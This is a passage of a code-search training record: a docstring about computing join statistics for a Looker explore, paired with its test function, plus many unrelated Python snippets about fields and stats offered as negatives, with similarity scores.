and add them to _loaded_fields\n # as an appropriate QueryFieldList\n fields = sorted(cleaned_fields, key=operator.itemgetter(1))\n for value, group in itertools.groupby(fields, lambda x: x[1]):\n fields = [field for field, value in group]\n self._loaded_fields += QueryFieldList(fields, value=value, _only_called=_only_called)\n\n return self", "def getData(self):\n import labstep.entities.experimentDataField.repository as experimentDataFieldRepository\n\n return experimentDataFieldRepository.getDataFields(self)", "def describe_index_fields(DomainName=None, FieldNames=None, Deployed=None):\n pass", "def pull_fields(self, org):\n pass", "def inspect_model_fields(self, model: ModelRepresentation) -> None:\n c = model.count()\n title(f\"{model.name} ({c})\")\n print(model.fields_info())", "def fields(request):\n # Only recognizes a few fields for now.\n if request.method != 'POST':\n fields = request.GET.getlist('field')\n response = {}\n if 'reviewers' in fields:\n response['reviewers'] = request.issue.reviewers or []\n if 'description' in fields:\n response['description'] = request.issue.description\n if 'subject' in fields:\n response['subject'] = request.issue.subject\n return response\n\n if not request.issue.edit_allowed:\n if not IS_DEV:\n return HttpTextResponse('Login required', status=401)\n fields = json.loads(request.POST.get('fields'))\n issue = request.issue\n if 'description' in fields:\n issue.description = fields['description']\n if 'reviewers' in fields:\n issue.reviewers = _get_emails_from_raw(fields['reviewers'])\n issue.calculate_updates_for()\n if 'subject' in fields:\n issue.subject = fields['subject']\n issue.put()\n return HttpTextResponse('')", "def get_fields(self):\n return self.fields", "def get_fields(self):\n return self.fields", "def test_get_used_explores(fc: fetcher.Fetcher, test_model, test_used_explore_names):\n used_explores = fc.get_used_explores(model=test_model[\"name\"])\n assert isinstance(used_explores, dict)\n assert all(e in test_used_explore_names for e in used_explores)", "def extract_fields(self, json_dict):\n raise NotImplementedError()", "def _retrieve_fields(self, scope, fields):\r\n if scope == Scope.user_state:\r\n return self._chunked_query(\r\n StudentModule,\r\n 'module_state_key__in',\r\n (descriptor.scope_ids.usage_id for descriptor in self.descriptors),\r\n course_id=self.course_id,\r\n student=self.user.pk,\r\n )\r\n elif scope == Scope.user_state_summary:\r\n return self._chunked_query(\r\n XModuleUserStateSummaryField,\r\n 'usage_id__in',\r\n (descriptor.scope_ids.usage_id for descriptor in self.descriptors),\r\n field_name__in=set(field.name for field in fields),\r\n )\r\n elif scope == Scope.preferences:\r\n return self._chunked_query(\r\n XModuleStudentPrefsField,\r\n 'module_type__in',\r\n set(descriptor.scope_ids.block_type for descriptor in self.descriptors),\r\n student=self.user.pk,\r\n field_name__in=set(field.name for field in fields),\r\n )\r\n elif scope == Scope.user_info:\r\n return self._query(\r\n XModuleStudentInfoField,\r\n student=self.user.pk,\r\n field_name__in=set(field.name for field in fields),\r\n )\r\n else:\r\n return []", "def getFieldNumbers():\n return _getCampaignDict()[\"field_numbers\"]", "def f(self):\r\n return self.fields()", "async def _get_facets_stats(self, index_schema, query_options,\n refinement_filter):\n facets_fields = [\n facet for facet in index_schema.facets\n if SolrSchemaFieldInfo.Type.is_facet_index(facet.type)\n ]\n request_facet_stats = [\n # e.g.: 
'{!count=true}myfacetname_facet'\n '{{!count=true}}{field_name}'.format(field_name=facet.solr_name)\n for facet in facets_fields\n ]\n solr_result = await self.solr.query_documents(\n collection=index_schema.collection, query=query_options.query_string,\n offset=0, limit=0, fields=['id'], def_type=query_options.def_type,\n query_fields=query_options.query_fields, filter_=refinement_filter,\n stats_fields=request_facet_stats\n )\n field_stats_items = []\n for facet in facets_fields:\n documents_count = solr_result.stats_results[facet.solr_name]['count']\n field_stats_items.append((facet, documents_count))\n return field_stats_items", "def get_fields():\n if not request.is_xhr:\n abort(403)\n fields = Field.query.all()\n result = {field.id:field.name for field in fields}\n return jsonify(result)", "def get_statistics_percentile(self,table,field):\n dict = {}\n for x in xrange(1,11):\n dict[x] = db.session.execute(\"select statistics_viewCount as percentile from meta order by percentile asc limit 1 OFFSET 19346*\"+str(x)+\"/10-1\").first().percentile", "def get_fields():\n return jsonify(result=Tree.fields())", "def get_drupal_field_cardinality(db_obj, db_cur, field_name):\n\n # query string and arguments\n query_str = (\n'''\nSELECT cardinality\nFROM field_config\nWHERE field_name = %s\nAND deleted = 0\n'''\n )\n query_args = ['field_' + field_name]\n\n # execute the query\n if not db_obj.execute(db_cur, query_str.strip(), query_args,\n has_results=True):\n return None\n ret = db_obj.fetchall(db_cur)\n if not ret[0]:\n return None\n if not ret[1]:\n return []\n # in theory, Drupal field names are unique, but it's not enforced in\n # the database, so add a sanity check\n if len(ret[1]) != 1:\n nori.core.email_logger.error(\n 'Warning: multiple entries for Drupal field name {0}.' 
.\n format(nori.pps(field_name))\n )\n return None\n return ret[1][0]", "def get_field_display_info(self, field_dict, field_name):\n raise NotImplementedError", "def get_fields(self):\n\n\t\treturn self.__fields", "def request_fields(self, fields=None):\n # The cursor only works for the 'search' endpoint, just call\n # the 'field' endpoint and return all the field types\n response = self.connection.get_request(self.uri_field)\n if response.status_code != requests.codes.ok:\n logger.warning('JIRA Cloud returned %d for %s', response.status_code, self.uri_field)\n return []\n content = json.loads(response.content)\n # Overwrite some fields\n for c in content:\n if c['name'] == 'Epic Status':\n c['schema']['type'] = 'string'\n c['choices'] = (('To Do', 'To Do'), ('In Progress', 'In Progress'), ('Done', 'Done'))\n elif c['name'] == 'Resolution':\n c['choices'] = self._get_resolutions()\n\n # The KEY field is never returned\n c = {\n \"id\": \"key\",\n \"key\": \"key\",\n \"name\": \"Key\",\n \"custom\": False,\n \"orderable\": True,\n \"navigable\": True,\n \"searchable\": True,\n \"clauseNames\": [\n \"key\",\n ],\n \"schema\": {\n \"type\": \"string\",\n }\n }\n content.append(c)\n # The parent field is never returned\n c = {\n \"id\": \"parent\",\n \"key\": \"parent\",\n \"name\": \"Parent\",\n \"custom\": True,\n \"orderable\": True,\n \"navigable\": True,\n \"searchable\": True,\n \"clauseNames\": [\n \"parent\",\n ],\n \"schema\": {\n \"type\": \"any\",\n \"custom\": \"com.django-atlassian:parent\"\n }\n }\n content.append(c)\n return content", "def get_fields(self):\n\n return self.get_coverage_rangetype()", "def stored_fields(self, docnum):\n\t\treturn self.index.collection.get(docnum).keys()", "def trace_all_fields(opt_model):\n osp = opt_model.optical_spec\n fld, wvl, foc = osp.lookup_fld_wvl_focus(0)\n fset = []\n for f in osp.field_of_view.fields:\n rset = trace_field(opt_model, f, wvl, foc)\n fset.append(rset)\n\n fdf = pd.concat(fset, keys=osp.field_of_view.index_labels,\n names=['field'])\n return fdf", "def fieldsUrl(self):\n return self.lweBaseUrl + \\\n \"/collections/\" + self.collectionName + \\\n \"/fields\"", "def db_stats(self):\n return { \"search_and_get\": self.db_search_and_get }", "def GatherPageData(self, mr):\n # TODO(jrobbins): Allow deep-linking into this page.\n canned_query_views = []\n if mr.project_id:\n with mr.profiler.Phase('getting canned queries'):\n canned_queries = self.services.features.GetCannedQueriesByProjectID(\n mr.cnxn, mr.project_id)\n canned_query_views = [\n savedqueries_helpers.SavedQueryView(sq, idx + 1, None, None)\n for idx, sq in enumerate(canned_queries)]\n\n saved_query_views = []\n if mr.auth.user_id and self.services.features:\n with mr.profiler.Phase('getting saved queries'):\n saved_queries = self.services.features.GetSavedQueriesByUserID(\n mr.cnxn, mr.me_user_id)\n saved_query_views = [\n savedqueries_helpers.SavedQueryView(sq, idx + 1, None, None)\n for idx, sq in enumerate(saved_queries)\n if (mr.project_id in sq.executes_in_project_ids or\n not mr.project_id)]\n\n return {\n 'issue_tab_mode': 'issueAdvSearch',\n 'page_perms': self.MakePagePerms(mr, None, permissions.CREATE_ISSUE),\n 'canned_queries': canned_query_views,\n 'saved_queries': saved_query_views,\n }", "def get_fields(node):\r\n return dict(iter_fields(node))", "def _all_data_fields(field):\n all_fields = PhotoTech.objects.all().values()\n return list(set([all_fields[x][field]\n for x in range(len(all_fields))]))", "def stats():\n stats = es.indices.stats(\n 
index='webpages',\n metric=[\"docs\", \"store\"],\n fields=[\"count\"],\n human='true'\n )\n \n return stats", "def get_statistics(self, data, field):\n statistics = super(NumberField, self).get_statistics(data, field)\n numeric_statistics = NumericStatistics(data)\n statistics.update(numeric_statistics.getSerializedData())\n return statistics", "def objectFields(self):\n raise NotImplementedError", "def get_fields_list(self):\n return self.description[\"fields\"][\"values\"].keys()", "def test_get_explores(fc: fetcher.Fetcher):\n explores = fc.get_explores()\n assert isinstance(explores, list)\n assert len(explores) > 0\n assert isinstance(explores[0], models.LookmlModelExplore)", "def _get_fields(self):\n if not self._cursor.description:\n return {}\n\n results = {}\n column = 0\n\n for des in self._cursor.description:\n fieldname = des[0]\n results[column] = fieldname\n column = column + 1\n\n return results", "def get_fields(self):\n return list(self.metadata.keys())", "def get_exp_meta(self, count=0):\n return {\n u\"limit\": 20,\n u\"next\": None,\n u\"offset\": 0,\n u\"previous\": None,\n u\"total_count\": count,\n }", "def get_fields(self):\n\t\tlogging.debug(\"Beginning\")\n\t\toptions=dict(api_key = self.apiKey, results = 0)\n\t\turl = '{ts}channels/{id}/feeds.json'.format(\n\t\t\tts=self.tsRUL,\n\t\t\tid=self.channel\n\t\t)\n\t\ttry:\n\t\t\tresults = requests.get(url, params=options)\n\t\t\tif results.ok != True:\n\t\t\t\tlogging.error(\"The URL didn't return a 200\")\n\t\t\t\treturn\n\t\texcept:\n\t\t\tlogging.error(\"Error calling the thingspeak URL\")\n\t\t\treturn\n\t\tresultsJson = results.json()\n\t\tchannelsJson = resultsJson['channel']\n\t\tfields = dict()\n\t\tfor i in range(1,8):\n\t\t\tif 'field'+str(i) in channelsJson:\n\t\t\t\tfields['field'+str(i)] = channelsJson['field'+str(i)]\n\t\treturn fields", "def get_fields(self):\n \n return self.metadata.keys()", "def list_fields(fixture_file=settings.FIXTURE_PATH, list_to_shell=True):\n fields = []\n with open(fixture_file, 'r') as posts:\n posts = json.load(posts, encoding='utf8')\n i = 0\n for post in posts:\n for field in post['fields']:\n fields.append(field)\n i += 1\n if list_to_shell:\n print yellow(\"All available BlogPost fields:\")\n print fields\n print yellow(\"%i fields total\" % i)\n return fields", "def get_features(item, GP):\n contents_url = '%s/contents' % item['url']\n\n # scrape readme\n gf.get_readme_length(contents_url, GP)\n\n # scrape file-by-file stats\n digest_repo(contents_url, GP)\n\n # scrape commit history\n gf.get_repo_commit_history(item, GP)\n\n # scrape stargazers\n GP.n_stars = item['stargazers_count']\n\n # scrape forks\n GP.n_forks = item['forks_count']\n\n return GP", "def test_accessing_json_fields(pawprint_default_tracker_db_with_table):\n\n tracker = pawprint_default_tracker_db_with_table\n\n # JSON objects in our tracking database\n simple = {\"integral\": \"derivative\"}\n medium = {\"montecarlo\": {\"prior\": \"likelihood\"}}\n difficult = {\n \"deepnet\": [\"mlp\", \"cnn\", \"rnn\"],\n \"ensembles\": {\"random\": \"forest\", \"always\": {\"cross_validate\": [\"kfold\", \"stratified\"]}},\n }\n\n tracker.write(event=\"maths\", metadata=simple)\n tracker.write(event=\"stats\", metadata=medium)\n tracker.write(event=\"ml\", metadata=difficult)\n\n maths_all = tracker.read(\"metadata__integral\")\n maths_condition = tracker.read(\"metadata__integral\", event=\"maths\")\n assert len(maths_all) == 3\n assert len(maths_condition) == 1\n assert list(maths_all.json_field) == 
[\"derivative\", None, None]\n\n stats = tracker.read(\"metadata__montecarlo__prior\").dropna()\n assert len(stats) == 1\n assert stats.json_field.iloc[0] == \"likelihood\"\n\n types_of_nn = tracker.read(\"metadata__deepnet\").dropna()\n best_nn = tracker.read(\"metadata__deepnet__1\").dropna()\n full_depth = tracker.read(\"metadata__ensembles__always__cross_validate__0\").dropna()\n assert len(types_of_nn) == 1\n assert len(best_nn) == 1\n assert best_nn.json_field.iloc[0] == \"cnn\"\n assert len(full_depth) == 1\n assert full_depth.json_field.iloc[0] == \"kfold\"", "def get_mediafile_details(mediafile_id, fields):\n query = MediaFiles.query \\\n .join(Locations, MediaFiles.location_id == Locations.id) \\\n .join(Users, MediaFiles.user_id == Users.id) \\\n .filter(MediaFiles.id == mediafile_id) \\\n .add_columns(*fields)\n logging.debug('Query executed: %s' % query)\n data = to_dict(query.first(), fields)\n values = {'accessed': get_time_str(), 'visits': data['visits'] + 1 if 'visits' in data else 0}\n if values['visits']:\n update_mediafile_values(mediafile_id, values)\n return data", "def fields(self):\n if self._fields is None:\n self._init_fields()\n return self._fields", "def stored_fields(self, docnum):\r\n return self.doc_reader[docnum]", "def search_fields(self, fields, query, index=None, doc_type=None):\r\n result_dict = {}\r\n master_list = []\r\n scores = {}\r\n for field in fields:\r\n items = self.search({\r\n 'query': {\r\n 'fuzzy_like_this_field': {\r\n field: {\r\n 'like_text': query\r\n ,'max_query_terms': 250\r\n }\r\n }\r\n }\r\n }, index=index, doc_type=doc_type, size=25)\r\n if len(items) > 0 :\r\n result_dict[field] = items\r\n\r\n seen = set()\r\n all = []\r\n for field in result_dict:\r\n for item in result_dict[field]:\r\n if item['_id'] not in seen:\r\n seen.add(item['_id'])\r\n all.append(item)\r\n\r\n return all", "def fields(self) -> List[Field]: # pragma: no cover\n pass", "def update_field_stats(self, tweet):\n\n stats = self.stats\n for f in self.tweet_fields:\n if tweet.has_key(f):\n f_val = tweet[f]\n if f_val is None:\n continue\n if stats[f].has_key(f_val):\n stats[f][f_val] += 1\n else:\n stats[f][f_val] = 1", "def test_query_api_result_fields():\n # Pick the first result and test for all fields\n result = query_api(url, \"test\")[0]\n assert all(field in result.keys() for field in fields)", "def all_fields(item):\n return scom.all_fields(item)", "def dig_fields(json_data):\n data = json.loads(json_data)\n fields = [f for f in data]\n return fields", "def get_fields(self):\n\t\treturn self.__fields.copy()", "def get_fieldlist(cls):\n return cls.fieldlist", "def get_fields(cls):\n return cls.fields.values()", "def test_get_document_with_fields(index_with_documents):\n response = index_with_documents().get_document(\"500682\", {\"fields\": [\"id\", \"title\"]})\n assert isinstance(response, Document)\n assert hasattr(response, \"title\")\n assert not hasattr(response, \"poster\")\n # assert 'poster' not in response\n assert response.title == \"The Highwaymen\"", "def _all_fields_all_data():\n # Takes all name fields\n all_fields = PhotoTech.objects.all().values()[0].keys()\n # For all fileds takes all fields data \n all_data = [PhotoView._all_data_fields(x) for x in all_fields]\n allowed_search_fields = ['zoom',\n 'matrix_resol',\n 'color',\n 'matrix_size',\n 'country']\n # Return dict {keys: fields}\n return {x: y for x, y in zip(all_fields, all_data)\n if x in allowed_search_fields}", "def fields(self):\n return ('title', 'services_used', 
'service_provider', \n 'allocated', 'used', 'community', \n 'topics', 'start_date', 'state')", "def field_values(self):\n return self.proto.field_values", "def getFields(self):\n return sorted(self.schema.fields, key=lambda f: f.name)", "def getFieldDetails(self, field_name):\n try:\n value_list = []\n con = self.getMetadataDatabaseConnection()\n results = con.cursor()\n con.cursor().callproc('qiime_assets.get_field_details', [field_name, results])\n\n for row in results:\n # column_name, data_type, desc_or_value, definition, active\n value_list.append((row[0], row[1], row[2], row[3], row[4]))\n \n if len(value_list) == 0:\n # If not found in the dictionary, assume this is a user-created column\n value_list.append((field_name, 'text', '', ''))\n \n return value_list[0]\n except Exception, e:\n print 'Exception caught: %s.\\nThe error is: %s' % (type(e), e)\n return False", "def test_get_explores_filters(fc: fetcher.Fetcher):\n explores = fc.get_explores(model=\"henry_dusty\")\n assert all(e.model_name == \"henry_dusty\" for e in explores)\n\n explores = fc.get_explores(model=\"henry_qa\", explore=\"explore_2_joins_all_used\")\n assert all(\n e.model_name == \"henry_qa\" and e.name == \"explore_2_joins_all_used\"\n for e in explores\n )", "def most_viewed(self, field):\r\n return PageHit.objects.filter(item=field)\\\r\n .annotate(score=models.Count('item'))\\\r\n .order_by('-score')", "def field(self, field):\r\n url = '{0}/{1}'.format(self.get_url(), field)\r\n request = http.Request('GET', url)\r\n return request, parsers.parse_json", "def get_host_data_fields(self):\n\n raise NotImplementedError", "def stats(self):\n raise NotImplementedError(\"Must implement in frontend subclass.\")", "def EvaluateLocationAndFields(self, *float, **kwargs):\n ...", "def statistics(self):\n stats = {}\n fields = {\n 'Hit count:': ('hit_count', Value.from_number),\n 'Miss count:': ('miss_count', Value.from_number),\n 'Hit ratio:': ('hit_ratio', Value.from_percent),\n 'Item count:': ('item_count', Value.from_number),\n 'Total cache size:': ('total_cache_size', Value.from_number),\n 'Oldest item age:': ('oldest_item_age', Value.from_time_ago),\n }\n selector = '#ae-stats-table tr'\n for element in self.doc.cssselect(selector):\n children = list(element)\n assert len(children) == 2, [text(child) for child in children]\n if text(children[0]).strip() in fields:\n # skip rows with invalid or empty cells\n field_name, value_fn = fields[text(children[0]).strip()]\n stats[field_name] = value_fn(text(children[1]))\n # Ensure all fields were filled.\n assert len(stats) == len(fields), (fields.keys(), stats.keys())\n return stats", "def get_api_fields(cls):\n return ['fqdn', 'ttl', 'description', 'views']", "def field(name,dr14=False,dir='./',minvisit=1) :\n all=struct.concat([dir+'/apVisitSum*.fits'])\n if name == 'M67' : locid=[os.environ['APOGEE_REDUX']+'/r8/fields/apo25m/4162//apVisitSum*']\n elif name == 'N188' : locid=[os.environ['APOGEE_REDUX']+'/r8/fields/apo25m/4217//apVisitSum*', \n os.environ['APOGEE_REDUX']+'/r8/fields/apo25m/5067//apVisitSum*']\n alldr14=struct.concat(locid)\n objs = set(all['APOGEE_ID'])\n vhelio = []\n vscat = []\n verr = []\n sigfiber = []\n vdiff = []\n n = []\n dr14vhelio = []\n dr14vscat = []\n dr14sigfiber = []\n dr14n = []\n dr14vdiff = []\n for obj in objs :\n j = np.where(all['APOGEE_ID'] == obj)[0]\n vhelio.append(all['VHELIO'][j].mean())\n vscat.append(all['VHELIO'][j].std())\n verr.append(all['VRELERR'][j].max())\n sigfiber.append(all['FIBERID'][j].std())\n 
vdiff.extend(all['VHELIO'][j]-all['VHELIO'][j].mean())\n n.append(len(j))\n #print(all['MJD'][j],all['VHELIO'][j])\n j = np.where(alldr14['APOGEE_ID'] == obj)[0]\n dr14vhelio.append(alldr14['VHELIO'][j].mean())\n dr14vscat.append(alldr14['VHELIO'][j].std())\n dr14sigfiber.append(alldr14['FIBERID'][j].std())\n dr14n.append(len(j))\n dr14vdiff.extend(alldr14['VHELIO'][j]-alldr14['VHELIO'][j].mean())\n #print(all['MJD'][j],all['VHELIO'][j],all['VRELERR'][j])\n #print(alldr14['MJD'][j],alldr14['VHELIO'][j],alldr14['VRELERR'][j])\n #pdb.set_trace()\n vhelio=np.array(vhelio)\n vscat=np.array(vscat)\n verr=np.array(verr)\n sigfiber=np.array(sigfiber)\n n=np.array(n)\n dr14vhelio=np.array(dr14vhelio)\n dr14vscat=np.array(dr14vscat)\n dr14sigfiber=np.array(dr14sigfiber)\n dr14n=np.array(dr14n)\n fig,ax=plots.multi(2,3)\n gd =np.where(n > minvisit)[0]\n ax[0,0].hist(vscat[gd],bins=np.arange(0.01,1,0.01),histtype='step',cumulative=True,normed=True,color='b')\n ax[0,0].hist(dr14vscat[gd],bins=np.arange(0.01,1,0.01),histtype='step',cumulative=True,normed=True,color='r')\n gd=np.where((verr < 0.2) & (n>minvisit))[0]\n ax[0,0].hist(vscat[gd],bins=np.arange(0.01,1,0.01),histtype='step',cumulative=True,normed=True,color='g')\n ax[0,0].hist(dr14vscat[gd],bins=np.arange(0.01,1,0.01),histtype='step',cumulative=True,normed=True,color='m')\n ax[2,1].hist(vscat[gd],bins=np.arange(0.01,1,0.01),histtype='step',color='k')\n ax[2,1].hist(dr14vscat[gd],bins=np.arange(0.01,1,0.01),histtype='step',color='r')\n\n plots.plotc(ax[1,0],vhelio-dr14vhelio,vscat-dr14vscat,verr,xr=[-0.5,0.5],yr=[-0.3,0.3],zr=[0,0.15])\n plots.plotc(ax[0,1],sigfiber,vscat-dr14vscat,verr,zr=[0,0.15],yr=[-0.3,0.3])\n plots.plotc(ax[1,1],vscat,vscat-dr14vscat,verr,zr=[0,0.15],yr=[-0.3,0.3],xr=[0,0.5])\n ax[2,0].hist(vdiff,color='b',bins=np.arange(-1.,1,0.01),histtype='step')\n ax[2,0].hist(dr14vdiff,color='r',bins=np.arange(-1.,1,0.01),histtype='step')\n fig.tight_layout()\n plt.show()", "def list_meta_fields():\n ret = {}\n status, result = _query(action=\"meta\", command=\"fields\")\n root = ET.fromstring(result)\n for field in root:\n field_id = None\n field_ret = {\"name\": field.text}\n for item in field.items():\n field_ret[item[0]] = item[1]\n if item[0] == \"id\":\n field_id = item[1]\n ret[field_id] = field_ret\n return ret", "def stats(self):", "def __getQueryData(self, query, fieldNames):\n results = self.__getQueryObject(query)\n # print results\n data = []\n if results['totalRows'] != '0':\n for row in results['rows']:\n rowData = {}\n for name, field in zip(fieldNames, row['f']):\n rowData[name] = field['v']\n data.append(rowData)\n return data", "def get_fields(request):\n\n json_resp = {}\n json_resp['fields'] = []\n json_resp['fields_to_ann'] = []\n all = request.GET.get('all',None)\n workpath = os.path.dirname(os.path.abspath(__file__)) # Returns the Path your .py file is in\n auto_request = request.GET.get('ns_id', None)\n report = request.GET.get('report', None)\n # print(request.session['report_type'])\n if report is not None or all == 'all':\n if report is not None:\n if report.startswith('PUBMED_'):\n json_resp['fields'] = ['volume','authors','year','journal']\n json_resp['fields_to_ann'] = ['title','abstract']\n else:\n json_resp = get_fields_from_json()\n if all == 'all':\n # All the possible fields for every usecase (MANUAL CONFIGURATION)\n json_resp = get_fields_from_json()\n if Report.objects.filter(institute = 'PUBMED').exists():\n json_resp['all_fields'].extend(['title','abstract','volume','journal','year','authors']) 
#aggiungo pubmed solo in coda!\n else:\n if request.session['report_type'] == 'pubmed':\n json_resp['fields'] = ['volume','authors','year','journal']\n json_resp['fields_to_ann'] = ['title','abstract']\n else:\n # Fileds related exclusively to a usecase\n json_resp = get_fields_from_json_configuration(request.session['usecase'],request.session['institute'],request.session['language'])\n if request.session['mode'] == 'Robot' or auto_request == 'Robot':\n with open(os.path.join(workpath, './automatic_annotation/auto_fields/auto_fields.json')) as out:\n data = json.load(out)\n json_resp['fields_to_ann'] = data['extract_fields'][request.session['usecase']]\n for el in json_resp['fields_to_ann']:\n if el in json_resp['fields']:\n json_resp['fields'].remove(el)\n # print('FIELDS', json_resp)\n return JsonResponse(json_resp)", "async def _get_schema_info(self, app_id, namespace, gae_index_name):\n collection = get_collection_name(app_id, namespace, gae_index_name)\n solr_schema_info = await self.solr.get_schema_info(collection)\n fields_info = solr_schema_info['fields']\n id_field = SolrSchemaFieldInfo(\n solr_name='id', gae_name='doc_id', type=Field.Type.ATOM,\n language=None, docs_number=fields_info.get('id', {}).get('docs', 0)\n )\n rank_field = SolrSchemaFieldInfo(\n solr_name='rank', gae_name='rank', type=Field.Type.NUMBER,\n language=None, docs_number=fields_info.get('rank', {}).get('docs', 0)\n )\n fields = [id_field, rank_field]\n grouped_fields = {\n 'doc_id': [id_field],\n 'rank': [rank_field]\n }\n facets = []\n grouped_facet_indexes = {}\n\n for solr_field_name, info in fields_info.items():\n try:\n gae_name, type_, language = parse_solr_field_name(solr_field_name)\n except ValueError:\n continue\n schema_field = SolrSchemaFieldInfo(\n solr_field_name, gae_name, type_, language, info.get('docs', 0)\n )\n if SolrSchemaFieldInfo.Type.is_facet_index(type_):\n add_value(grouped_facet_indexes, gae_name, schema_field)\n if SolrSchemaFieldInfo.Type.is_facet(type_):\n facets.append(schema_field)\n else:\n fields.append(schema_field)\n add_value(grouped_fields, gae_name, schema_field)\n\n for fields_group in grouped_fields.values():\n if len(fields_group) > 1:\n # Sadly app uses the same name for fields with different types [*1].\n # Let's sort them from high popularity to low.\n fields_group.sort(key=lambda solr_field: -solr_field.docs_number)\n\n for facets_group in grouped_facet_indexes.values():\n if len(facets_group) > 1:\n # Sadly app uses the same name for facets with different types [*1].\n # Let's sort them from high popularity to low.\n facets_group.sort(key=lambda solr_field: -solr_field.docs_number)\n\n index_info = solr_schema_info['index']\n return SolrIndexSchemaInfo(\n app_id=app_id,\n namespace=namespace,\n gae_index_name=gae_index_name,\n collection=collection,\n docs_number=index_info['numDocs'],\n heap_usage=index_info['indexHeapUsageBytes'],\n size_in_bytes=index_info['segmentsFileSizeInBytes'],\n fields=fields,\n facets=facets,\n grouped_fields=grouped_fields,\n grouped_facet_indexes=grouped_facet_indexes\n )" ]
[ "0.757388", "0.66561705", "0.5693254", "0.5563461", "0.5562313", "0.55102324", "0.55069894", "0.54181457", "0.5415948", "0.53354806", "0.53127414", "0.528702", "0.5241747", "0.52340806", "0.52330387", "0.52114326", "0.51936793", "0.5185652", "0.51400167", "0.5138318", "0.5132618", "0.5127807", "0.51146215", "0.51070225", "0.5106135", "0.5088951", "0.50864375", "0.5081033", "0.50448966", "0.50198954", "0.5015429", "0.5009088", "0.5003628", "0.5003628", "0.5001013", "0.49991417", "0.49893072", "0.4987319", "0.4986451", "0.49833003", "0.49571592", "0.49468642", "0.4945561", "0.49320614", "0.49315163", "0.49265844", "0.4926118", "0.49182642", "0.49163514", "0.48885593", "0.4874684", "0.48683193", "0.48634312", "0.4846087", "0.48458105", "0.48332086", "0.4831649", "0.48200655", "0.48187646", "0.48147914", "0.48094964", "0.47901323", "0.4788112", "0.47852707", "0.47839144", "0.47706425", "0.47692594", "0.4766253", "0.47579056", "0.4720955", "0.4719269", "0.47170916", "0.47115842", "0.4706557", "0.4698921", "0.46831483", "0.46746755", "0.46736172", "0.46677616", "0.46628562", "0.46604782", "0.4660417", "0.46569505", "0.46547002", "0.46519625", "0.46508056", "0.46385604", "0.4636647", "0.4634278", "0.46265987", "0.46259937", "0.4620329", "0.46181014", "0.46164754", "0.46163332", "0.46132794", "0.46132034", "0.46101552", "0.46091598", "0.46053213" ]
0.7587318
0
fetcher.get_explore_join_stats() should return the stats of all joins in an explore.
def test_get_explore_join_stats(fc: fetcher.Fetcher, test_model): explore = fc.get_explores( model=test_model["name"], explore="explore_2_joins_1_used" )[0] field_stats = { "explore_2_joins_1_used.d1": 10, "explore_2_joins_1_used.d2": 5, "explore_2_joins_1_used.d3": 0, "explore_2_joins_1_used.m1": 0, "join1.d1": 10, "join1.d2": 10, "join1.d3": 10, "join1.m1": 0, "join2.d1": 0, "join2.d2": 0, "join2.d3": 0, "join2.m1": 0, } join_stats = fc.get_explore_join_stats(explore=explore, field_stats=field_stats) assert isinstance(join_stats, dict) assert len(join_stats) == 2 assert join_stats == {"join1": 30, "join2": 0}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def extract_join_info(node):\n operator_info = node['operatorInfo']\n analyze_info = node['AnalyzeInfo']\n\n if 'Join' in node['id']:\n # Join Node\n join_type = extract_join_type(operator_info)\n conditions = extract_join_conditions(operator_info)\n current_node = JoinPlan(join_type, conditions)\n assert 'children' in node and len(node['children']) == 2\n childrens = node['children']\n current_node.left_node = extract_join_info(childrens[0])\n current_node.right_node = extract_join_info(childrens[1])\n current_node.execute_time = analyze_info[\"time\"]\n current_node.est_rows = node[\"estRows\"]\n else:\n # Table Reader\n # assert 'TableReader' in node['id']\n # extract selection if need\n current_node = extract_table_reader(node)\n current_node.est_rows = node['estRows']\n return current_node", "def join_stats(join_on, mg_stats):\n new_stats = {}\n\n def add_metagenome_stats(new_mgs, old_mgs):\n return MetagenomeStats(*[getattr(new_mgs, f) + getattr(old_mgs, f) for f in old_mgs._fields])\n\n for mgs in mg_stats:\n # find maximally matching join criterion\n max_match = 0\n group = ''\n for grp in join_on:\n if grp in mgs[0] and len(grp) > max_match:\n max_match = len(grp)\n group = grp\n\n new_stats[group] = mgs[1] if group not in new_stats else add_metagenome_stats(mgs[1], new_stats[group])\n return new_stats", "def num_joins(self):\n return self._num_joins", "def test_get_explore_field_stats(\n fc: fetcher.Fetcher,\n looker_sdk: methods.Looker40SDK,\n test_model,\n test_used_explore_names,\n test_explores_stats,\n):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=test_used_explore_names[0]\n )[0]\n actual_stats = fc.get_explore_field_stats(explore)\n assert isinstance(actual_stats, dict)\n\n for e in test_explores_stats:\n if e[\"name\"] == test_used_explore_names[0]:\n expected_stats = e\n\n assert all(actual_stats[k] == 0 for k in expected_stats[\"unused_fields\"])\n assert all(actual_stats[k] > 0 for k in expected_stats[\"used_fields\"])", "def joins(self):\n return self._joins", "def num_joins(self):\n ret_val = self._num_joins()\n return ret_val", "def get(self):\n join = request.args.get('join')\n limit = request.args.get('limit')\n\n current_user = User.find_by_username(get_jwt_identity())\n\n if join is None:\n room_list = Room.query.all()\n else:\n if join == 'true':\n room_list = current_user.joined_room\n else:\n room_list = Room.query.filter(~Room.members.any(id=current_user.id)) \\\n .limit(limit if limit is not None else 15).all()\n result = rooms_schema.dump(room_list)\n return {\"status\": \"success\", \"data\": result}, 200", "def test_get_used_explores(fc: fetcher.Fetcher, test_model, test_used_explore_names):\n used_explores = fc.get_used_explores(model=test_model[\"name\"])\n assert isinstance(used_explores, dict)\n assert all(e in test_used_explore_names for e in used_explores)", "def join(self):\n super().join()\n return self.grad, self.traj_infos, self.opt_info", "async def on_member_join(self, member: Member) -> None:\n if member.guild.id != Guild.id:\n return\n\n self.bot.stats.gauge(\"guild.total_members\", len(member.guild.members))", "def test_get_explore_fields_gets_fields(\n fc: fetcher.Fetcher, test_model, test_explores_stats\n):\n test_explore = test_explores_stats[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=test_explore[\"name\"])\n assert isinstance(explore, list)\n explore = explore[0]\n assert isinstance(explore, models.LookmlModelExplore)\n assert explore.model_name == test_model[\"name\"]\n assert 
